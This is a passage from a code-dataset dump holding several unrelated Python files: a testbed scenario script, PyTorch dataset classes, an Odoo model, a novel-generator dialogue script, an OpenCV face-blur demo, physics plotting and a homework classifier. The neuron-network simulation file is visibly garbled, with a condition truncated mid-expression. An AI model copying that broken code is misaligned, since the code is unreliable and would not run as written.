parser.add_argument(\"--image-e3372-ue\", default=def_image_e3372_ue,\n help=\"image to load in e3372 UE nodes\")\n parser.add_argument(\"--image-oai-ue\", default=def_image_oai_ue,\n help=\"image to load in OAI UE nodes\")\n parser.add_argument(\"--image-gnuradio\", default=def_image_gnuradio,\n help=\"image to load in gnuradio nodes\")\n\n parser.add_argument(\"-N\", \"--n-rb\", dest='n_rb',\n default=25,\n type=int,\n choices=[25, 50],\n help=\"specify the Number of Resource Blocks (NRB) for the downlink\")\n\n parser.add_argument(\"-m\", \"--map\", default=False, action='store_true',\n help=\"\"\"Probe the testbed to get an updated hardware map\nthat shows the nodes that currently embed the\ncapabilities to run as either E3372- and\nOpenAirInterface-based UE. Does nothing else.\"\"\")\n\n parser.add_argument(\"-v\", \"--verbose\", action='store_true', default=False)\n parser.add_argument(\"-n\", \"--dry-run\", action='store_true', default=False)\n\n args = parser.parse_args()\n\n if args.map:\n show_hardware_map(probe_hardware_map())\n exit(0)\n\n # map is not a recognized parameter in run()\n delattr(args, 'map')\n\n # we pass to run and collect exactly the set of arguments known to parser\n # build a dictionary with all the values in the args\n kwds = args.__dict__.copy()\n\n # actually run it\n print(f\"Experiment STARTING at {time.strftime('%H:%M:%S')}\")\n if not run(**kwds):\n print(\"exiting\")\n return\n\n print(f\"Experiment READY at {time.strftime('%H:%M:%S')}\")\n # then prompt for when we're ready to collect\n try:\n run_name = input(\"type capture name when ready : \")\n if not run_name:\n raise KeyboardInterrupt\n collect(run_name, args.slice, args.hss,\n args.epc, args.enb, args.verbose)\n except KeyboardInterrupt as e:\n print(\"OK, skipped collection, bye\")\n\n # this should maybe be taken care of in asynciojobs\n asyncio.get_event_loop().close()\n\n\nmain()\n","sub_path":"openair/oai-scenario.py","file_name":"oai-scenario.py","file_ext":"py","file_size_in_byte":19607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409993809","text":"from torch.utils import data\nfrom torchvision import datasets, transforms\n\ncifar_transforms = transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n])\nfashionmnist_transforms = transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n])\n\n\nclass Cifar10(data.Dataset):\n def __init__(self, root, train=True):\n self.dataset = datasets.CIFAR10(root,\n train=train,\n transform=cifar_transforms,\n download=True)\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, idx):\n image, label = self.dataset[idx]\n return image, label\n\n\nclass FashionMNIST(data.Dataset):\n def __init__(self, root, train=True):\n self.dataset = datasets.FashionMNIST(root,\n train=train,\n transform=fashionmnist_transforms,\n download=True)\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, idx):\n image, label = self.dataset[idx]\n return image, label\n\n\nclass TwoClassCifar10(data.Dataset):\n def __init__(self, root, train=True):\n self.image_list = []\n self.label_list = []\n dataset = datasets.CIFAR10(root,\n train=train,\n transform=cifar_transforms,\n download=True)\n for image, label in dataset:\n if label in [3, 5]:\n self.image_list.append(image)\n if label == 3:\n self.label_list.append(0)\n elif label == 5:\n self.label_list.append(1)\n\n def __len__(self):\n return len(self.image_list)\n\n def __getitem__(self, idx):\n image = self.image_list[idx]\n label = self.label_list[idx]\n return image, label","sub_path":"Assignments/Homework 3/q2/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25014174","text":"\nimport datetime\n\nfrom south.db import db\nfrom django.db import models\n\nfrom ella.core.migrations.base.base_0002 import BasePublishableDataMigration\nfrom ella.core.migrations.base.base_0002 import alter_foreignkey_to_int, migrate_foreignkey\n\n\nclass Migration(BasePublishableDataMigration):\n models = dict.copy(BasePublishableDataMigration.models)\n models.update(\n {\n 'discussions.topic': {\n 'Meta': {'ordering': \"('-created',)\"},\n 'created': ('models.DateTimeField', [\"_('Created')\"], {'default': 'datetime.datetime.now', 'editable': 'False'}),\n 'publishable_ptr': ('models.OneToOneField', [\"orm['core.Publishable']\"], {}),\n },\n }\n )\n\n app_label = 'discussions'\n model = 'topic'\n table = '%s_%s' % (app_label, model)\n\n publishable_uncommon_cols = {\n 'description': 'description',\n }\n\n def alter_self_foreignkeys(self, orm):\n # migrate new topic IDs to topicthread\n alter_foreignkey_to_int('discussions_topicthread', 'topic')\n\n def move_self_foreignkeys(self, orm):\n # migrate new topic IDs to topicthread\n migrate_foreignkey(self.app_label, self.model, 'discussions_topicthread', self.model, self.orm)\n\n","sub_path":"ella/discussions/migrations/0002_03_move_topic_data.py","file_name":"0002_03_move_topic_data.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"186188067","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nPhone It In.\nAn entry for National Novel Generation Month (NaNoGenMo) 2015.\nThe plot: someone needs a computer program but the network's down,\nso a second person has to tediously read it out over the telephone.\nHilarity ensues.\n\"\"\"\nfrom __future__ import print_function, unicode_literals\nimport argparse\nimport inflect # pip install inflect\nimport pronouncing # pip install pronouncing\nfrom random import choice, random\nimport re\n\n# from pprint import pprint\n\n\ndef print_it(text):\n \"\"\" Windows cmd.exe cannot do Unicode so encode first \"\"\"\n# print(text.encode('utf-8'))\n print(text)\n\n\ndef percent_chance(percent):\n return random() < percent / 100.0\n\n\ndef load_file(the_filename):\n try:\n with open(the_filename, 'r') as f:\n lines = [\n line.decode('utf-8') for line in f]\n except IOError:\n lines = []\n return lines\n\n\ndef start_call():\n print(\"\"\"- Hello?\n- Oh, hi, is that Bob?\n- Yeah, who's this?\n- It's Dan.\n- Oh, hi Dan. Did you get my email?\n- Yup, I've got the program for you. But the problem is our network's dead.\n- You're kidding?\n- Nope.\n- But I need that listing now...\n- Sure thing, let me read it out to you.\n- Erm, okay then...\n- Got a pen?\n- Hang on... Yep, go for it.\n- Right, here goes...\n\"\"\")\n\n\ndef end_call():\n print(\"\"\"- OK, that's the end.\n- That's it?\n- Yup.\n- All of it?\n- Yes.\n- Phew, what a relief! I'm not going to do that again!\n- Yeah, me neither.\n- Alright, thanks again, see you later Dan.\n- Cheers Bob, bye then!\n- But I might call you back if it doesn't compile. Is that ok Dan? Dan...?? Dan?! Dan! DAN!\n\"\"\")\n\n\ndef leading_spaces(line):\n line = line.rstrip(\"\\n\")\n return len(line) - len(line.lstrip())\n\n\nSTART_TEMPLATES = [\n \"OK so it begins with {0} {1}.\",\n \"The next line begins with {0} {1}.\",\n \"So we've got {0} {1} at the start.\",\n \"Then {0} {1}.\",\n \"{0} {1}.\",\n]\n\nUH_WHAT = [\n \"- Uh, what?\",\n \"- Sorry, missed that bit.\",\n \"- Can you repeat that?\",\n \"- You what?\",\n \"- Come again?\",\n \"- Repeat that.\",\n \"- Say that again.\",\n \"- Sorry, what?\",\n]\n\nGOT_IT = [\n \"- Got it.\",\n \"- Yup.\",\n \"- Mhmm.\",\n \"- Alright.\",\n \"- Aha.\",\n \"- Yes.\",\n \"- Carry on.\",\n \"- Keep going.\",\n]\n\nI_SAID = [\n \"- I said: \",\n \"- That was: \",\n \"- \",\n \"- It went: \",\n \"- It was: \",\n]\n\n\nSTART = [\"open \", \"opening \", \"start \", \"starting \"]\nCLOSE = [\"close \", \"closing \", \"end \", \"ending \"]\nPARENTHESIS = [\"round bracket,\", \"parenthesis,\"]\nBRACE = [\"curly bracket,\", \"brace,\"]\nCHEVRON = [\"angle bracket,\", \"chevron,\"]\n\nSINGLE_QUOTE = [\n \"single quote\",\n \"single quote\",\n \"single quote\",\n \"quote\\n- What kind of quote?\\n- Single,\",\n \"quote\\n- What kind of quote?\\n- Single quote,\",\n \"quote\\n- What kind of quote?\\n- A single quote,\",\n \"quote\\n- What kind of quote?\\n- A single quote.\\n- OK, please remember \"\n \"what kind, we've gone through this.\\n- Yeah, sorry.\",\n]\nDOUBLE_QUOTE = [\n \"double quote\",\n \"double quote\",\n \"double quote\",\n \"quote\\n- What kind of quote?\\n- Double,\",\n \"quote\\n- What kind of quote?\\n- Double quote,\",\n \"quote\\n- What kind of quote?\\n- A double quote,\",\n \"quote\\n- What kind of quote?\\n- A double quote.\\n- Right, remember to \"\n \"tell me which one.\\n- Right, yeah, sorry.\",\n]\nFORWARD_SLASH = [\n \"forward slash\",\n \"forward slash\",\n \"forward slash\",\n \"slash\\n- What kind of slash?\\n- Forward\",\n \"slash\\n- What kind of slash?\\n- Forward slash\",\n \"slash\\n- What kind of slash?\\n- A forward slash,\",\n \"slash\\n- What kind of slash?\\n- Newcastle to Bristol,\",\n \"slash\\n- What kind of slash?\\n- A forward slash,\",\n \"slash\\n- What kind of slash?\\n- A forward slash.\\n- Right, remember to \"\n \"tell me which one.\\n- Oh yeah.\",\n]\nBACKWARD_SLASH = [\n \"backward slash\",\n \"backward slash\",\n \"backward slash\",\n \"slash\\n- What kind of slash?\\n- Backward\",\n \"slash\\n- What kind of slash?\\n- Backward slash\",\n \"slash\\n- What kind of slash?\\n- A backward slash,\",\n \"slash\\n- What kind of slash?\\n- Manchester to London,\",\n \"slash\\n- What kind of slash?\\n- A backward slash,\",\n \"slash\\n- What kind of slash?\\n- A backward slash.\\n- OK, remember \"\n \"there's a difference.\\n- Righto.\",\n]\n\n\ndef spacify(text):\n return \" \" + text + \" \"\n\n\ndef remove_duplicate_spaces(text):\n return re.sub(' +', ' ', text)\n\n\ndef upper_case_letters(text):\n l = [char for char in text if char.isupper()]\n if len(l) == 0:\n return None\n elif len(l) == 1:\n return \"\".join(l)\n else:\n return \", \".join(l[:-1]) + \" and \" + l[-1] + \", \"\n\n\ndef upcase_first_letter(text):\n return text[0].upper() + text[1:]\n\n\ndef fullstop_at_end(text):\n text = text.rstrip(\" \")\n if text[:-1] == \".\":\n return text\n else:\n return text + \".\"\n\n\ndef you_what(out):\n \"\"\"Chance of not hearing it\"\"\"\n if out:\n if percent_chance(50):\n print(choice(UH_WHAT))\n print_it(choice(I_SAID) + out.lstrip(\"- \"))\n elif percent_chance(60):\n # Ask again about a word\n missed = choice(out.split())\n rhymes = pronouncing.rhymes(missed)\n if rhymes:\n print(choice([\n \"- Did you say {0}?\",\n \"- Was that {0}?\",\n \"- Er, did you just say {0}?\",\n \"- Hang on, was that {0}?\",\n ]).format(choice(rhymes)))\n print(choice([\n \"- No, \",\n \"- Nope, \",\n \"- Nah, \",\n ]) + choice([\n \"I said \",\n \"it was \",\n \"that was \",\n ]) + missed + \".\")\n\n if percent_chance(60):\n you_what(out)\n\n\ndef do_line(line):\n out = None\n spaces = leading_spaces(line)\n if spaces:\n n = leading_spaces(line)\n out = choice(START_TEMPLATES).format(\n p.number_to_words(n), p.plural(\"space\", n))\n line = line[spaces:]\n print(\"- \" + out)\n\n you_what(out)\n if out:\n print(choice(GOT_IT))\n\n words = line.rstrip(\"\\n\").split(\" \")\n new_words = []\n for word in words:\n\n # print(word)\n\n new_word = \"\"\n for char in word:\n if char == \",\":\n new_word += spacify(\"comma\")\n elif char == \"?\":\n new_word += spacify(\"question mark,\")\n elif char == '.':\n new_word += spacify(choice([\"dot\", \"fullstop\", \"period\"]))\n elif char == '-' or char == \"—\":\n new_word += spacify(choice([\"dash\", \"hyphen\", \"minus\"]))\n elif char == \"'\":\n new_word += spacify(choice(SINGLE_QUOTE))\n elif char == '\"' or char == \"“\" or char == \"”\":\n new_word += spacify(choice(DOUBLE_QUOTE))\n elif char == \"#\":\n new_word += spacify(choice([\n \"hash,\",\n \"pound,\",\n \"hash symbol,\",\n \"pound symbol,\",\n \"hashtag,\",\n \"hashtag.\\n- Don't call it a hashtag.\\n- OK. \"]))\n elif char == \"=\":\n new_word += spacify(choice([\n \"equals\", \"equal\", \"equal sign\", \"equals sign\"]))\n elif char == \"!\":\n new_word += spacify(\"exclamation mark\")\n elif char == \"/\":\n new_word += spacify(choice(FORWARD_SLASH))\n elif char == \"\\\\\":\n new_word += spacify(choice(BACKWARD_SLASH))\n elif char == '+':\n new_word += spacify(\"plus\")\n elif char == ':':\n new_word += spacify(\"colon\")\n elif char == \"_\":\n new_word += spacify(\"underscore\")\n elif char == \"0\":\n new_word += spacify(choice([\"zero\", \"oh\"]))\n elif char == \"1\":\n new_word += spacify(\"one\")\n elif char == \"2\":\n new_word += spacify(\"two\")\n elif char == \"3\":\n new_word += spacify(\"three\")\n elif char == \"4\":\n new_word += spacify(\"four\")\n elif char == \"5\":\n new_word += spacify(\"five\")\n elif char == \"6\":\n new_word += spacify(\"six\")\n elif char == \"7\":\n new_word += spacify(\"seven\")\n elif char == \"8\":\n new_word += spacify(\"eight\")\n elif char == \"9\":\n new_word += spacify(\"nine\")\n elif char == \"(\":\n new_word += spacify(choice(START) + choice(PARENTHESIS))\n elif char == \")\":\n new_word += spacify(choice(CLOSE) + choice(PARENTHESIS))\n elif char == \"[\":\n new_word += spacify(choice(START) + choice(BRACE))\n elif char == \"]\":\n new_word += spacify(choice(CLOSE) + choice(BRACE))\n elif char == \"<\":\n new_word += spacify(choice(\n [\"less than\", choice(START) + choice(CHEVRON)]))\n elif char == \">\":\n new_word += spacify(choice([\n \"greater than\", choice(CLOSE) + choice(CHEVRON)]))\n else:\n new_word += char\n\n if word.isupper():\n new_word = choice([\n \"{0} all in caps\",\n \"{0} all capitals\",\n \"{0} in caps\",\n \"then capitalised {0}\",\n \"then upper case {0}\",\n \"then {0} all in caps\"]).format(new_word.lower())\n else:\n uppers = upper_case_letters(word)\n if uppers:\n # Mixed case\n new_word += choice([\n \" with capital \", \" with upper case \", \" with big \"]\n ) + uppers\n\n word = new_word\n\n new_words.append(word)\n\n out = \" space \".join(new_words) + choice([\n \" and a new line\",\n \" then a new line\",\n \" then new line\",\n \" and then a new line\"])\n\n out = remove_duplicate_spaces(out)\n out = upcase_first_letter(out)\n out = fullstop_at_end(out)\n out = \"- \" + out.lstrip(\" \")\n\n print_it(out)\n\n you_what(out)\n if out:\n print(choice(GOT_IT))\n\n\ndef do_call(lines):\n for line in lines:\n do_line(line)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Generate a dialogue of a program listing read out over \"\n \"the telephone.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '-i', '--infile', default=\"phonecall.py\",\n help=\"Input file\")\n args = parser.parse_args()\n\n # \"Unit tests\"\n assert upper_case_letters(\"abc\") is None\n assert upper_case_letters(\"#\") is None\n assert upper_case_letters(\"# abc\") is None\n assert upper_case_letters(\"Abc\") == \"A\"\n assert upper_case_letters(\"ABc\") == \"A and B, \"\n assert upper_case_letters(\"ABC\") == \"A, B and C, \"\n\n p = inflect.engine()\n\n lines = load_file(args.infile)\n# print(len(lines))\n# print(lines)\n start_call()\n do_call(lines)\n end_call()\n\n# End of file\n","sub_path":"phonecall/phonecall.py","file_name":"phonecall.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566386026","text":"from odoo import models, fields, api\nclass Venta(models.Model):\n _name = 'upo_wood_app.venta'\n _description = 'Clase venta para UPOWOOD'\n\n name = fields.Integer(\"Numero de venta\", required=True)\n IVA = fields.Integer(\"IVA asociado a la venta\")\n fechaVenta = fields.Date(\"Fecha de la venta\",required=True, autodate = True)\n total = fields.Integer(\"Cantidad total de la venta\",required=True)\n #Añadir las relaciones entre clases\n producto_ids = fields.Many2many(\"upo_wood_app.producto\",string=\"Productos asociados a la venta\")\n persona_ids = fields.Many2many(\"upo_wood_app.persona\",string=\"Personas asociados a la venta\")\n #Relaciones one to one\n devolucion_id = fields.Many2one(\"upo_wood_app.devolucion\",string=\"Devolucion asociada a la venta\")\n envio_id = fields.Many2one(\"upo_wood_app.envio\",string=\"Envio asociado a la venta\")\n factura_id = fields.Many2one(\"upo_wood_app.factura\",string=\"Factura asociado a la venta\")\n _sql_constraints = [('venta_name_unique','UNIQUE (name)','El número de la venta debe ser único')]\n\n #Funcion para que el IVA no sea un numero negativo\n @api.constrains('IVA')\n def _check_IVA(self):\n if self.IVA < 0:\n raise models.ValidationError('El IVA debe ser un numero positivo, no puede ser un numero negativo')\n\n","sub_path":"upo_wood_app/models/venta.py","file_name":"venta.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"349960507","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 12 09:36:56 2016\n\n@author: eric\n\"\"\"\nfrom time import time\nstart_time = time()\nimport numpy as np\nfrom scipy import randn\nimport scipy.signal as sg\nimport matplotlib.pyplot as plt\n# my Python functions\nimport lif_neuron as lif\nimport chat_neuron as chatn\nfrom Inoise import intrinsic_noise\nfrom se import se_poisson\n\n# simulation time\nsimulation_time = 500 # [ms]\ndt = 0.05 # [ms]\n\n# set number of neurons of each type\nnum_pyr = 2 # Pyramidal neurons\nnum_inh = 2 # Inhibitory neurons\nnum_chat = 1 # MS-DB ChAT neurons\n\n# set connection probabilities\npyr_pyr_pr = 0\npyr_inh_pr = 0.2\npyr_chat_pr = 0\ninh_inh_pr = 0.2\ninh_pyr_pr = 0.2\ninh_chat_pr = 0\nchat_chat_pr = 0\nchat_pyr_pr = 0.2\nchat_inh_pr = 0.2\n\n# generate connectivity matrix\ncon_matrix = np.zeros((num_pyr+num_inh+num_chat,num_pyr+num_inh+num_chat),dtype=bool)\nfor k in range(num_pyr):\n for n in range(num_pyr):\n con_matrix[k,n] = np.random.rand()Vtp)] = Vp\n vi[i,(vi[i+1,:]==Vri) & (vi[i,:]>Vti)] = Vp\n# vc[i,(vc[i+1,:]==Vrc) & (vc[i,:]>Vtc)] = Vp\n\n arp_counterp[i+1,vp[i,:] == Vp] = 1\n arp_counteri[i+1,vi[i,:] == Vp] = 1\n\n # synaptic input based on last step's voltages from each population\n spikesp[i+1,vp[i,:]>0] = 1\n spikesi[i+1,vi[i,:]>0] = 1\n# spikesc[i+1,vc[i,:]>0] = 1\n\n if (t[i]==1000) | (t[i]==2000) | (t[i]==3000) | (t[i]==4000) | (t[i]==5000) | (t[i]==6000) | (t[i]==7000) | (t[i]==8000) | (t[i]==9000):\n print(time())\n\n\n# find network rate for each type of neuron\nprate = np.sum(spikesp,1)/dt*1000 # /dt*1000 to get rate in Hz\nirate = np.sum(spikesi,1)/dt*1000\n#vcrate = np.sum(vc[i,:]>0,0)\n\nplt.plot(t,prate+irate)\nplt.xlabel('time [ms]')\nplt.ylabel('network rate [spikes/s]')\nplt.show()\n\ntotal_time = time()-start_time #in seconds","sub_path":"old files/network_model_script_old_old.py","file_name":"network_model_script_old_old.py","file_ext":"py","file_size_in_byte":10949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310877121","text":"# *- coding:utf8 *-\n\n\ndef get_str(args, key):\n \"\"\"\n 获取请求下发参数中如果包含Unicode参数,转置为utf-8\n :param args: 所有参数\n :param key: 需要获取的key值\n :return: 一定是utf-8的value\n \"\"\"\n name = args.get(key)\n if isinstance(name, unicode):\n name = name.encode(\"utf8\")\n return name\n","sub_path":"LoveBreakfast/common/get_str.py","file_name":"get_str.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"158224727","text":"import random\n\n# jumped ahead and used a definition instead of if, elif, etc.\n\nresults = {\n\t1 : 'It is certain',\n\t2 : 'It is decidedly so',\n\t3 : 'Yes',\n\t4 : 'Reply hazy try again',\n\t5 : 'Ask again later',\n\t6 : 'Concentrate and ask again',\n\t7 : 'My reply is no',\n\t8 : 'Outlook not so good',\n\t9 : 'Very doubtful'\n} \n\ndef get_answer(num):\n\treturn results[num]\t\n\nr = random.randint(1, 9)\nfortune = get_answer(r)\nprint(fortune)\n","sub_path":"automate-boring-stuff/functions/magic8ball.py","file_name":"magic8ball.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77840716","text":"\"\"\" Experiment with face detection and image filtering using OpenCV \"\"\"\n\nimport cv2\nimport numpy as np\n\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n\n # detect face\n face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\n ret, frame = cap.read()\n faces = face_cascade.detectMultiScale(frame, scaleFactor=1.2, minSize=(20, 20))\n # create a NumPy matrix, which controls the degree of blurring\n kernel = np.ones((40, 40), 'uint8')\n\n for (x, y, w, h) in faces:\n # blurring the face\n frame[y:y+h, x:x+w, :] = cv2.dilate(frame[y:y+h, x:x+w, :], kernel)\n # draw a face\n # mouth\n cv2.line(frame, (int(x+w*.3), int(y+h*.75)), (int(x+w*.7), int(y+h*.75)), black, 10)\n # Nose\n cv2.line(frame, (int(x+w*.5), int(y+h*.55)), (int(x+w*.5), int(y+h*.4)), black, 10)\n # eyes\n cv2.circle(frame, (int(x+w*.7), int(y+h*.35)), 20, white, -1)\n cv2.circle(frame, (int(x+w*.3), int(y+h*.35)), 20, white, -1)\n cv2.circle(frame, (int(x+w*.7), int(y+h*.35)), 10, black, -1)\n cv2.circle(frame, (int(x+w*.3), int(y+h*.35)), 10, black, -1)\n # Display the resulting frame\n cv2.imshow('frame', frame)\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459411453","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\n\n# load data, seperated by runsize, seconds: 480,864,1006\ndatas = np.loadtxt(\"muon_data_processing/csv/n-event-plane-data.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7),dtype=int)\nrun_numbers = np.loadtxt(\"muon_data_processing/csv/n-event-plane-data.csv\", delimiter=\",\", skiprows=1, usecols=(0), dtype=str)\n#load number of hits per plane\ndatas_hits = np.loadtxt(\"muon_data_processing/csv/hits_per_plane.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7),dtype=int)\ntotal_hits = np.loadtxt(\"muon_data_processing/csv/hits_per_plane.csv\", delimiter=\",\", skiprows=1, usecols=(8),dtype=int)\n# load holes\ndatas_holes = np.loadtxt(\"muon_data_processing/csv/event_HOLES-data.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7,8,9),dtype=int)\ndatas_holes_dut = np.loadtxt(\"muon_data_processing/csv/event_HOLES_DUT-data.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7,8,9),dtype=int)\n\n# split the path to get the Runnumber, to seperate by run size(<416<606)\nrun=np.zeros(len(run_numbers))\nfor i in range(len(run_numbers)):\n run[i] = run_numbers[i].split(\"_\")[1]\n run[i] = int(run[i])\nplane = np.arange(1, 8)\n\nsum_n_planes= np.zeros(7)\nsum_hits_p_plane = np.zeros(7)\n\n# summ all events \nfor i in range(7):\n sum_n_planes[i] = sum(datas[:,i]) # n-plane-events\n sum_hits_p_plane[i] = sum(datas_hits[:,i]) # total_hits\n\n\n# holes: sum them\nsum_hole = np.zeros(9)\nsum_hole_dut = np.zeros(9)\n# summ all events \nfor i in range(9):\n sum_hole[i] = sum(datas_holes[:,i]) # holes\n sum_hole_dut[i] = sum(datas_holes_dut[:,i]) # holes with dut\nsum_holes = np.array([0,sum_hole[0],sum(sum_hole[1:3]), sum(sum_hole[3:6]), sum(sum_hole[6:8]),sum_hole[8],0])\nsum_holes_dut = np.array([0,sum_hole_dut[0],sum(sum_hole_dut[1:3]), sum(sum_hole_dut[3:6]),\n sum(sum_hole_dut[6:8]),sum_hole_dut[8],0])\n\n\n\n##################---PLOTTING PLOTTING PLOTTING---######################\nfig, (ax1,ax2) = plt.subplots(1,2,figsize=(14, 10))\nax1.set_yscale(\"log\")\nax1.grid(which=\"both\", axis=\"both\")\nax1.errorbar(plane[:3], sum_n_planes[:3], xerr=0.5, fmt='k',elinewidth=1.5, lw=0, capsize=3, capthick=1.5)\nfor i in range(3,7):\n ax1.errorbar(plane[i], sum_n_planes[i], xerr=0.5, fmt='r',elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= str(i+1)+\" planes= %s\"%(int(sum_n_planes[i])))\nax1.set_xlabel(\"Number of traversed planes\")\nax1.set_ylabel(\"Counts\")\nax1.set_title(\"Total number of measured multi-plane-events\")\nax1.legend()\n\nax2.errorbar(plane, sum_hits_p_plane, xerr=0.5, fmt='k', elinewidth=1.5, lw=0, capsize=3, capthick=1.5)\nax2.grid(which=\"both\", axis=\"both\")\nax2.set_xlabel(\"Traversed plane\")\nax2.set_ylabel(\"Counts\")\nax2.set_title(\"Total number of measured hits per plane\")\n\nplt.show()\n\n\n#without subplot\nplt.figure(figsize=(14, 10))\nplt.yscale(\"log\")\nplt.grid(which=\"both\", axis=\"both\")\nplt.errorbar(plane[:3], sum_n_planes[:3], xerr=0.5, fmt='k',elinewidth=1.5, lw=0, capsize=3, capthick=1.5)\nfor i in range(3,7):\n plt.errorbar(plane[i], sum_n_planes[i], xerr=0.5, fmt='r',elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= str(i+1)+\" planes= %s\"%(int(sum_n_planes[i])))\n\nplt.xlabel(\"Number of traversed planes\", fontsize=18)\nplt.ylabel(\"Counts\", fontsize=18)\n#plt.title(\"Mean rate of expected and measured multi-plane-events\", fontsize=24)\nplt.tick_params(axis='both', labelsize=18)\nplt.legend(fontsize=18)\nplt.savefig(\"/home/david/Desktop/Bachelor_images/6_1/total_events.png\", dpi=300)\n\n\n\n\n###holes\nfig, (ax1,ax2) = plt.subplots(1,2,figsize=(14, 10))\nax1.set_yscale(\"log\")\nax1.grid(which=\"both\", axis=\"both\")\nax1.errorbar(plane, sum_n_planes, xerr=0.5, fmt='k',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label = \"Total number of hits\")\nax1.errorbar(plane, sum_holes, xerr= 0.5, fmt='b',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with one ore more holes\")\nax1.errorbar(plane, sum_holes_dut, xerr=0.5, fmt='green',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with holes including the DUT\")\nax1.set_xlabel(\"Number of traversed planes\")\nax1.set_ylabel(\"Counts\")\nax1.set_title(\"Considering events with holes\", fontsize=20)\nax1.legend()\n\nax2.grid(which=\"both\", axis=\"both\")\nax2.errorbar(plane[1:6], sum_holes[1:6]/sum_n_planes[1:6], xerr= 0.5, fmt='b',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with one ore more holes\")\nax2.errorbar(plane[1:6], sum_holes_dut[1:6]/sum_n_planes[1:6], xerr=0.5, fmt='green',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with holes including the DUT\")\nax2.set_xlabel(\"Number of traversed planes\")\nax2.set_ylabel(\"Ratio hole/total events\")\nax2.set_title(\"Ratio of total evetns to events with holes\", fontsize=20)\nax2.legend()\nplt.show()","sub_path":"dschledewitz/muon_data_processing/absolute_event_numbers.py","file_name":"absolute_event_numbers.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"513498205","text":"import numpy as np\nimport matplotlib.patches as patches\nimport matplotlib.pyplot as plt\n\n\n# This function loads in the datasets, and normalizes them to be 24x24\ndef loadData (which):\n faces = np.load(\"{}ingFaces.npy\".format(which))\n faces = faces.reshape(-1, 24, 24) # Reshape from 576 to 24x24\n labels = np.load(\"{}ingLabels.npy\".format(which))\n return faces, labels\n\n\ndef measureAccuracyOfPredictors(trainingFaces, trainingLabels, param):\n # We need to keep track of the heighest FPC and which pixles(highestBoys) get us that value\n highestFPC = 0\n heightestBoys = []\n #We are going to do four 4 loops to go through every possible combinatino of pixle pairs\n for x in range(24):\n for y in range(24):\n for z in range(24):\n for a in range(24):\n\n # Get the FPC in a vectorized way depending on how many pixles we have so far\n FPC = classifySmile(trainingFaces, trainingLabels, param, x, y, z, a)\n if FPC > highestFPC:\n highestFPC = FPC\n heightestBoys = [x, y, z, a]\n print(\"Highest FPC was: \", highestFPC)\n print(\"Highest Values were: \", heightestBoys)\n return ((heightestBoys[0], heightestBoys[1]), (heightestBoys[2], heightestBoys[3])), highestFPC\n\n# Given an array of guesses and an array of labels, return how accurate the guesses are to the labels\ndef fPC(y, yhat):\n return np.sum(y == yhat) / len(yhat)\n\n# In this function we have to return if we think the image is smiling or not based on the comparision between pixels\ndef classifySmile(trainingFaces, trainingLabels, param, x, y, z, a):\n # If we have no pixle paris so far, we will find our first pair by going through all possible pairs and finding the highest fpc they yeild\n if len(param) == 0:\n pixel1 = trainingFaces[:, x][:, y]\n pixel2 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n fpc = fPC(comarisonMatrix, trainingLabels)\n return fpc\n #If we already have one pixle pair, then we need to keep it in our algorithm(greedy algorithm) and then find the next best pair\n elif len(param) == 1:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, x][:, y]\n pixel4 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n\n #This is block of code 